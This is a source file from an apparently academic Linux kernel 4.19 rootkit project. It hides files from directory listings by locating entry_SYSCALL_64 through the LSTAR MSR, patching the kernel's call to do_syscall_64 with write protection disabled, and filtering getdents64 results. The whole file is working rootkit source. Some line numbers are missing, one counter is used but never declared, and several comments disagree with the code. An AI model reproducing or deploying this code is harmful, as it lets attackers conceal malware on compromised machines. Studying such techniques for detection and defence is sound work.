linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

filehide_lstar.c (8222B)


      1 #include <linux/kernel.h>
      2 #include <linux/string.h>
      3 #include <linux/slab.h>
      4 #include <linux/fdtable.h>
      5 #include <linux/dcache.h>
      6 #include <linux/delay.h>
      7 #include <linux/irqflags.h>
      8 #include <asm/nospec-branch.h>
      9 #include <asm/msr-index.h>
     10 
     11 #include "filehide_lstar.h"
     12 #include "filehide.h"
     13 #include "pidhide.h"
     14 #include "openhide.h"
     15 #include "common.h"
     16 #include "rootkit.h"
     17 #include "hook.h"
     18 
#define SEARCHLEN  512

//Number of tasks currently executing inside our g7_syscall_64 detour;
//unhide_files_lstar waits on this before letting the hook disappear
atomic_t syscall64_count;

extern rootkit_t rootkit;

//Idea: build path from entry_SYSCALL_64_trampoline to do_syscall64 by gathering addresses piece by piece
//(1) JMP_NOSPEC %rdi -> (2) [entry_SYSCALL_64_stage2] jmp entry_SYSCALL_64_after_hwframe -> (3) [entry_SYSCALL_64] call do_syscall_64
//                                     ||                                                 ||=====>
//                               can be skipped ==========================================//

//sign-extended (0x48 REX.W) mov rdi, imm
static const char *movSignExtended = "\x48\xc7\xc7";

//The first call in entry_SYSCALL_64 is the right one, so grabbing it is easy
static const char *callNearRelative = "\xE8";

static void hexdump(char *, int);
static unsigned long read_msr(unsigned int);
static inline unsigned long mem_offset(char *ptr);
static char *find_do_syscall_64(char *lstar_addr);

void g7_syscall_64(unsigned long, struct pt_regs *);
//Original kernel do_syscall_64, resolved at install time by find_do_syscall_64()
void (*do_syscall_64)(unsigned long, struct pt_regs *);
void check_getdents64(void);
//Address of the `call` opcode inside entry_SYSCALL_64 that we patch
static char *syscall_64_ptr;
//Original rel32 displacement of that call, saved so unhide can restore it
static unsigned long old_off;
     47 void
     48 hide_files_lstar(void)
     49 {
     50     if (atomic_read(&syscall64_install_count) == 0) {
     51         atomic_inc(&syscall64_install_count);
     52         atomic_set(&syscall64_count, 0);
     53         syscall_64_ptr = find_do_syscall_64((char *)read_msr(MSR_LSTAR));
     54 
     55         if(!do_syscall_64 || !syscall_64_ptr) {
     56             DEBUG_INFO("Couldn't find do_syscall64!\n");
     57             return;
     58         }
     59 
     60         //Calculate new call offset to our function
     61         //newOff = g7_syscall_64_addr - nextOpcodeAddr
     62         unsigned long new_off = (unsigned long)check_getdents64 - ((unsigned long)syscall_64_ptr + 5);
     63 
     64         disable_protection();
     65         memcpy((void *)check_getdents64, "\x90\x90\x90\x90\x90", 5);
     66         memcpy((syscall_64_ptr + 1), &new_off, 4);
     67         enable_protection();
     68 
     69         hexdump((char *)check_getdents64, 32);
     70     }
     71 }
     72 
     73 void
     74 unhide_files_lstar(void)
     75 {
     76     if (atomic_read(&syscall64_install_count) == 1) {
     77         atomic_dec(&syscall64_install_count);
     78         disable_protection();
     79         memcpy((syscall_64_ptr + 1), &old_off, 4);
     80         enable_protection();
     81 
     82         if ((atomic_read(&syscall64_count)) > 0)
     83             msleep(1000);
     84     }
     85 }
     86 
     87 //Only use with multiples of 16..
     88 //Best friend for this exercise, alongside https://defuse.ca/online-x86-assembler.htm
     89 static void
     90 hexdump(char *addr, int n)
     91 {
     92     int k = 0;
     93 
     94     DEBUG_INFO("Hexdump:\n");
     95     while(k < n) {
     96         DEBUG_INFO("%02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX",
     97                 addr[k], addr[k + 1], addr[k + 2], addr[k + 3], addr[k + 4], addr[k + 5], addr[k + 6], addr[k + 7], addr[k + 8], addr[k + 9],
     98                 addr[k + 10], addr[k + 11], addr[k + 12], addr[k + 13], addr[k + 14], addr[k + 15]);
     99         k += 16;
    100     }
    101 }
    102 
    103 static inline long
    104 sign_extend(int n)
    105 {
    106     if(n & (1 << 31))
    107         return n |= 0xFFFFFFFF00000000;
    108 
    109     return n;
    110 }
    111 
    112 //Get sign-extended 4 byte offset from memory
    113 static inline unsigned long
    114 mem_offset(char *ptr)
    115 {
    116     unsigned long ret = 0;
    117 
    118     memcpy(&ret, ptr, 4);
    119     return sign_extend(ret);
    120 }
    121 
    122 //Finds do_syscall_64, sets it, and returns the pointer to the original call
    123 static char *
    124 find_do_syscall_64(char *lstar_addr)
    125 {
    126     //Step 1: get address of stage 2 trampoline
    127     //If lstar_addr points to entry_SYSCALL_64 directly, skip this part (the case on rkcheck VM)
    128     unsigned long next_addr;
    129 
    130     char *stage2_ptr = strnstr(lstar_addr, movSignExtended, SEARCHLEN);
    131 
    132     if(!stage2_ptr)
    133         //we are probably at entry_SYSCALL_64
    134         next_addr = (unsigned long)lstar_addr;
    135     else
    136         next_addr = mem_offset(stage2_ptr + 3); //3 bytes offset to skip opcode
    137 
    138     //Step 2: conveniently, no 'pointer' chasing is necessary, we can just look for the jump opcode from here
    139     char *syscall64_call_ptr = strnstr((char *)next_addr, callNearRelative, SEARCHLEN);
    140 
    141     if(!syscall64_call_ptr)
    142         return NULL;
    143 
    144     //Get offset from memory
    145     unsigned long syscall64_off = old_off = mem_offset(syscall64_call_ptr + 1); //1 byte offset to skip call opcode
    146 
    147     //Store correct address of do_syscall_64
    148     //Offset relative to _next_ instruction -> e8 xx xx xx xx -> 5 bytes
    149     do_syscall_64 = ((void *)syscall64_call_ptr + 5) + syscall64_off;
    150 
    151     return syscall64_call_ptr;
    152 }
    153 
//To avoid issues when unloading, check first for getdents64
//Defer other syscalls to avoid increasing our atomic count
//We use a jump to avoid building a new stack frame with call
//GCC generates a call instruction at the beginning here that we overwrite with NOPs..
//see also objdump -d -M intel g7.ko | grep -A 3 check_getdents64
//
//Entered via the patched call in entry_SYSCALL_64, so %rdi still holds the
//syscall number: 217 (getdents64 on x86-64) is routed through g7_syscall_64,
//everything else tail-jumps straight to the saved original do_syscall_64.
//NOTE: hide_files_lstar NOPs the first 5 bytes of this function, so the
//byte layout of the prologue matters -- do not restructure this code.
void
check_getdents64(void)
{
    __asm__ volatile (
        "\tcmp $217, %%rdi\n"
        "\tje g7_syscall_64\n"
        "\tjmp *%0\n"
        :: "r"(do_syscall_64)
    );
}
    169 
    170 void
    171 g7_syscall_64(unsigned long nr, struct pt_regs *pt_regs)
    172 {
    173     atomic_inc(&syscall64_count);
    174     do_syscall_64(nr, pt_regs);
    175 
    176     //
    177     //  ( ͡°Ĺ̯ ͡° )
    178     //
    179     //https://elixir.bootlin.com/linux/v4.19.163/source/fs/buffer.c#L1218
    180     local_irq_enable();
    181 
    182     typedef struct linux_dirent64 *dirent64_t_ptr;
    183 
    184     unsigned long offset;
    185     dirent64_t_ptr kdirent, cur_kdirent, prev_kdirent;
    186     struct dentry *kdirent_dentry;
    187 
    188     cur_kdirent = prev_kdirent = NULL;
    189     int fd = (int)pt_regs->di;
    190     dirent64_t_ptr dirent = (dirent64_t_ptr)pt_regs->si;
    191     long ret = (long)regs_return_value(pt_regs);
    192 
    193     if (ret <= 0 || !(kdirent = (dirent64_t_ptr)kzalloc(ret, GFP_KERNEL)))
    194         return;
    195 
    196     if (copy_from_user(kdirent, dirent, ret))
    197         goto yield;
    198 
    199     kdirent_dentry = current->files->fdt->fd[fd]->f_path.dentry;
    200 
    201     inode_list_t hidden_inodes = { 0, NULL };
    202     inode_list_t_ptr hi_head, hi_tail;
    203     hi_head = hi_tail = &hidden_inodes;
    204 
    205     struct list_head *i;
    206     list_for_each(i, &kdirent_dentry->d_subdirs) {
    207         unsigned long inode;
    208         struct dentry *child = list_entry(i, struct dentry, d_child);
    209 
    210         if ((inode = must_hide_inode(child)))
    211             hi_tail = add_inode_to_list(hi_tail, inode);
    212     }
    213 
    214     for (offset = 0; offset < ret;) {
    215         cur_kdirent = (dirent64_t_ptr)((char *)kdirent + offset);
    216 
    217         if (list_contains_inode(hi_head, cur_kdirent->d_ino)) {
    218             if (cur_kdirent == kdirent) {
    219                 ret -= cur_kdirent->d_reclen;
    220                 memmove(cur_kdirent, (char *)cur_kdirent + cur_kdirent->d_reclen, ret);
    221                 continue;
    222             }
    223 
    224             prev_kdirent->d_reclen += cur_kdirent->d_reclen;
    225         } else
    226             prev_kdirent = cur_kdirent;
    227 
    228         offset += cur_kdirent->d_reclen;
    229     }
    230 
    231     copy_to_user(dirent, kdirent, ret);
    232 
    233 yield:
    234     kfree(kdirent);
    235 
    236     atomic_dec(&syscall64_count);
    237     local_irq_disable();
    238 }
    239 
//Read the 64-bit MSR `msr` with the rdmsr instruction, which takes the MSR
//index in ECX and returns the value split across EDX:EAX (high:low).
static unsigned long
read_msr(unsigned int msr)
{
    unsigned int low, high;

    __asm__ volatile (
                    "movl %[msr], %%ecx\n\t"
                    "rdmsr\n\t"
                    "mov %%eax, %[low]\n\t"
                    "mov %%edx, %[high]"
                    : [low] "=r" (low), [high] "=r" (high)
                    : [msr] "r" (msr)
                    : "ecx", "eax", "edx"
    );

    //Get two 32bit values into a 64bit variable
    unsigned long ret = high;
    ret <<= 32;
    ret |= low;

    return ret;
}
    262 
    263 // static void
    264 // write_msr(unsigned int low, unsigned int high, unsigned int msr)
    265 // {
    266 //     __asm__ volatile (
    267 //                     "movl $0xc0000082, %%ecx\n\t"
    268 //                     "mov %[low], %%eax\n\t"
    269 //                     "mov %[high], %%edx\n\t"
    270 //                     "wrmsr"
    271 //                     :
    272 //                     : [low] "r" (low), [high] "r" (high)
    273 //                     : "ecx", "eax", "edx"
    274 //     );
    275 // }